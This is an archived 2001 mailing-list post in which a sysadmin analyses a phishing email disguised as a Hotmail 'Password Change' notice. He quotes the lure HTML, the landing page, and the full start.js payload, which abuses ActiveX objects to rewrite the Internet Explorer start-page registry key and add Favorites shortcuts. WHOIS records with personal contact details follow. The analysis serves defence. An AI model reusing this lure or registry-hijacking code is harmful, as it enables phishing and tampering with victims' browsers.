Vulnerability Development mailing list archives
Hotmail message malware
From: quentyn () fotango com
Date: Fri, 10 Aug 2001 14:09:24 +0100
there appears to be a new hotmail malware thingy it is sent from admin02 () hotmail com with the subject line of Password Change wonder how many people it will get before all the sites are closed? Detail - I just recieved this mail from 202.104.122.157 [1] #START
From admin02 () hotmail com Thu, 09 Aug 2001 18:21:54 -0700
Received: from [202.104.122.157] by hotmail.com (3.2) with ESMTP id MHotMailBD3C81DB0068400431DDCA687A9D0C810; Thu, 09 Aug 2001 18:20:28 -0700 Received: FROM html BY mail-server ; Fri Aug 10 09:17:50 2001 +0800 From: admin02 () hotmail com To: ${MYEMAIL}@hotmail.com Subject: Password Change Date: Sat, 8 Sep 2001 08:13:32 Mime-Version: 1.0 Content-Type: text/html; charset="DEFAULT_CHARSET" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2919.6700 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700 <HTML> <HEAD> </HEAD> <BODY TEXT="#000000" BGCOLOR="#336699" LINK="yellow" VLINK="#551A8B" ALINK="#FF0000"> <P ALIGN="CENTER"><FONT SIZE="+3"><B>Password Change Confirmation</B></FONT> </P> <P ALIGN="CENTER"><FONT SIZE="+1"><B>Your Password has been successfully changed. Please remember your new Password. </B></FONT></P> <P ALIGN="CENTER"><FONT COLOR="#FFFF80"><A HREF="http://maeveshomepage.com/ty.htm">If you did not authorize this please click here to restore your old password.</A></FONT> </P> </BODY> </HTML> #END now going to maeveshomepage.com/ty.htm [2] in opera shows #START <!DOCTYPE HTML PUBLIC "-//SoftQuad//DTD HoTMetaL PRO 5.0::19980907::extensions to HTML 4.0//EN" "hmpro5.dtd"> <HTML> <HEAD> <TITLE></TITLE> </HEAD> <BODY BGCOLOR="#336699"> <P ALIGN="CENTER"><FONT SIZE="+3"><B>Thank You</B></FONT> </P> <P ALIGN="CENTER"><FONT SIZE="+2">Your old password has been restored.</FONT> <SCRIPT SRC="start.js"> </SCRIPT> </P> </BODY> </HTML> #END and looking at start.js (the interesting bit) #START document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>") function AddFavLnk(loc, DispName, SiteURL) { var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL"); Shor.TargetPath = SiteURL; Shor.Save(); } function f(){ try { a1=document.applets[0]; a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"); a1.createInstance(); Shl = a1.GetObject(); a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}"); a1.createInstance(); FSO = a1.GetObject(); a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}"); a1.createInstance(); Net = a1.GetObject(); try{ var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90)); document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;" ///////////////////////////////////////////////////////////////////////////////Ö÷Ò³ Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://yahhooo.devil.ru/"); var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90)); document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;" var WF, Shor, loc; WF = FSO.GetSpecialFolder(0); loc = WF + "\\Favorites"; if(!FSO.FolderExists(loc)) { loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\Favorites"; if(!FSO.FolderExists(loc)) { return; } } ///////////////////////////////////////////////////////////////////////////////ÊղؼРAddFavLnk(loc, " Britney Spears Nude", "http://www.celebrities-revealed.com"); AddFavLnk(loc, " Aol", "http://www.aol.com"); } catch(e){ } } catch(e){ } } function init(){ setTimeout("f()", 1000); } init(); #END it appears to set your default home page to http://yahhooo.devil.ru/ [3] and get your favorites (which may contain saved usernames and passwords) anybody got anything further? Q Notes [1] - inetnum: 202.104.122.128 - 202.104.122.159 netname: SHENZHEN-JLXXCY-INFOR-LTD descr: SHENZHEN JULINGXINXICHANYE INFORMATION CO.LTD country: CN admin-c: HB58-AP tech-c: HB58-AP mnt-by: MAINT-CHINANET-GD changed: ipadm () gddc com cn 20000920 source: APNIC person: HU BOG address: F11,BUSSINESS NEWSPAPER OLYMPIC MANSION,SHENZHEN country: CN phone: +86-755-3521135 fax-no: +86-755-3396971 e-mail: ipuser () gddc com cn nic-hdl: HB58-AP mnt-by: MAINT-CHINANET-GD changed: ipadm () gddc com cn 20000920 source: APNIC [2] - Registrant: JBO 223 S. 5th usa, O --- US Domain Name: MAEVESHOMEPAGE.COM Administrative Contact: I, TJ bwestby () midwest net 223 S. 5th usa, O --- US 1115551212 Technical Contact: I, TJ bwestby () midwest net 223 S. 5th usa, O --- US 1115551212 Billing Contact: I, TJ bwestby () midwest net 223 S. 5th usa, O --- US 1115551212 Record last updated on 11-Jul-2001. Record expires on 07-May-2002. Record Created on 07-May-2001. Domain servers in listed order: NS1.VEGASSECURE.NET 208.50.15.6 NS2.VEGASSECURE.NET 208.50.15.7 [3] - domain: DEVIL.RU type: CORPORATE admin-o: AK2000-RIPN nserver: ns.kravchenko.ru. nserver: srvr.list.ru. created: 07-AUG-2000 state: Delegated changed: 19-MAY-2001 mnt-by: ANDRIUSHA-MNT-RIPN source: RIPN person: Andrey S Kravchenko nic-hdl: AK2000-RIPN address: Teatralny st 23a/30, address: Donetsk, Ukraine, 340100 phone: +7 902 6010000 fax-no: +7 902 6010000 e-mail: andrey () kravchenko ru changed: 18-AUG-2000 mnt-by: ANDRIUSHA-MNT-RIPN source: RIPN -- ##################### Quentyn Taylor Sysadmin - Fotango ##################### You're damn right we need a rational code of morality and ethics. But not much progress can be made in that direction while we've still got a majority ranting about gods, devils, souls, and absolute morality, and using an ancient book written by ignorant nomads as a guide.
Current thread:
- Hotmail message malware quentyn (Aug 10)